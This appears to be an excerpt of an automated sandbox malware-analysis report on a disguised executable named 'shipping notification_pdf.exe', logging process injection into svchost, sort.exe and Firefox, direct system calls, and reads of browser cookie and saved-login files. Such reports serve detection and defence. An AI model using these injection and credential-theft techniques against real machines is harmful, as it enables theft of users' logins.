            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366674D mov eax, dword ptr fs:[00000030h]8_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366674D mov eax, dword ptr fs:[00000030h]8_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03630750 mov eax, dword ptr fs:[00000030h]8_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672750 mov eax, dword ptr fs:[00000030h]8_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672750 mov eax, dword ptr fs:[00000030h]8_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03703749 mov eax, dword ptr fs:[00000030h]8_2_03703749
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B4755 mov eax, dword ptr fs:[00000030h]8_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF72E mov eax, dword ptr fs:[00000030h]8_2_036EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03633720 mov eax, dword ptr fs:[00000030h]8_2_03633720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364F720 mov eax, dword ptr fs:[00000030h]8_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364F720 mov eax, dword ptr fs:[00000030h]8_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364F720 mov eax, dword ptr fs:[00000030h]8_2_0364F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F972B mov eax, dword ptr fs:[00000030h]8_2_036F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C720 mov eax, dword ptr fs:[00000030h]8_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C720 mov eax, dword ptr fs:[00000030h]8_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0370B73C mov eax, dword ptr fs:[00000030h]8_2_0370B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629730 mov eax, dword ptr fs:[00000030h]8_2_03629730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03629730 mov eax, dword ptr fs:[00000030h]8_2_03629730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03665734 mov eax, dword ptr fs:[00000030h]8_2_03665734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363973A mov eax, dword ptr fs:[00000030h]8_2_0363973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363973A mov eax, dword ptr fs:[00000030h]8_2_0363973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366273C mov eax, dword ptr fs:[00000030h]8_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366273C mov ecx, dword ptr fs:[00000030h]8_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366273C mov eax, dword ptr fs:[00000030h]8_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036AC730 mov eax, dword ptr fs:[00000030h]8_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03637703 mov eax, dword ptr fs:[00000030h]8_2_03637703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03635702 mov eax, dword ptr fs:[00000030h]8_2_03635702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03635702 mov eax, dword ptr fs:[00000030h]8_2_03635702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366C700 mov eax, dword ptr fs:[00000030h]8_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03630710 mov eax, dword ptr fs:[00000030h]8_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03660710 mov eax, dword ptr fs:[00000030h]8_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366F71F mov eax, dword ptr fs:[00000030h]8_2_0366F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366F71F mov eax, dword ptr fs:[00000030h]8_2_0366F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363D7E0 mov ecx, dword ptr fs:[00000030h]8_2_0363D7E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036527ED mov eax, dword ptr fs:[00000030h]8_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036527ED mov eax, dword ptr fs:[00000030h]8_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036527ED mov eax, dword ptr fs:[00000030h]8_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036347FB mov eax, dword ptr fs:[00000030h]8_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036347FB mov eax, dword ptr fs:[00000030h]8_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0363C7C0 mov eax, dword ptr fs:[00000030h]8_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036357C0 mov eax, dword ptr fs:[00000030h]8_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036357C0 mov eax, dword ptr fs:[00000030h]8_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036357C0 mov eax, dword ptr fs:[00000030h]8_2_036357C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B07C3 mov eax, dword ptr fs:[00000030h]8_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036B97A9 mov eax, dword ptr fs:[00000030h]8_2_036B97A9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036BF7AF mov eax, dword ptr fs:[00000030h]8_2_036BF7AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_037037B6 mov eax, dword ptr fs:[00000030h]8_2_037037B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036307AF mov eax, dword ptr fs:[00000030h]8_2_036307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0365D7B0 mov eax, dword ptr fs:[00000030h]8_2_0365D7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F7BA mov eax, dword ptr fs:[00000030h]8_2_0362F7BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036EF78A mov eax, dword ptr fs:[00000030h]8_2_036EF78A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F866E mov eax, dword ptr fs:[00000030h]8_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036F866E mov eax, dword ptr fs:[00000030h]8_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A660 mov eax, dword ptr fs:[00000030h]8_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0366A660 mov eax, dword ptr fs:[00000030h]8_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03669660 mov eax, dword ptr fs:[00000030h]8_2_03669660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03669660 mov eax, dword ptr fs:[00000030h]8_2_03669660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03662674 mov eax, dword ptr fs:[00000030h]8_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364C640 mov eax, dword ptr fs:[00000030h]8_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0364E627 mov eax, dword ptr fs:[00000030h]8_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]8_2_0362F626
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0362F626 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03666620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03705636 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03668620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0363262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03661607 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0366F603 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0364260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03633616 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03672619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036C36EE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0365D6E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036636EF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036AE6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036B06F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036ED6F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0366A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0363B6C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036F16CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036EF6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036616CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0366C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0362D6AA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036276B2 mov eax, dword ptr fs:[00000030h]

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtMapViewOfSection: Direct from: 0x77762D1C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtCreateMutant: Direct from: 0x777635CC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtResumeThread: Direct from: 0x777636AC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtReadFile: Direct from: 0x77762ADC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtDelayExecution: Direct from: 0x77762DDC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtQueryInformationProcess: Direct from: 0x77762C26
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtResumeThread: Direct from: 0x77762FBC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtCreateUserProcess: Direct from: 0x7776371C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtSetInformationThread: Direct from: 0x777563F9
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtSetInformationThread: Direct from: 0x77762B4C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtClose: Direct from: 0x77762B6C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtCreateKey: Direct from: 0x77762C6C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtQuerySystemInformation: Direct from: 0x777648CC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtOpenSection: Direct from: 0x77762E0C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtQueryInformationToken: Direct from: 0x77762CAC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtTerminateThread: Direct from: 0x77762FCC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtCreateFile: Direct from: 0x77762FEC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtOpenFile: Direct from: 0x77762DCC
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtOpenKeyEx: Direct from: 0x77762B9C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtSetInformationProcess: Direct from: 0x77762C5C
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\sort.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: read write
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: NULL target: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\sort.exe | Thread register set: target process: 3312
            Source: C:\Windows\SysWOW64\sort.exe | Thread APC queued: target process: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: AAB008
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Process created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"
            Source: C:\Windows\SysWOW64\sort.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: ?Program Manager
            Source: AVyNLNHPrma.exe, 0000000A.00000002.3144271325.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000000.1459380312.0000000001620000.00000002.00000001.00040000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614866064.0000000001560000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: shipping notification_pdf.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\sort.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\sort.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
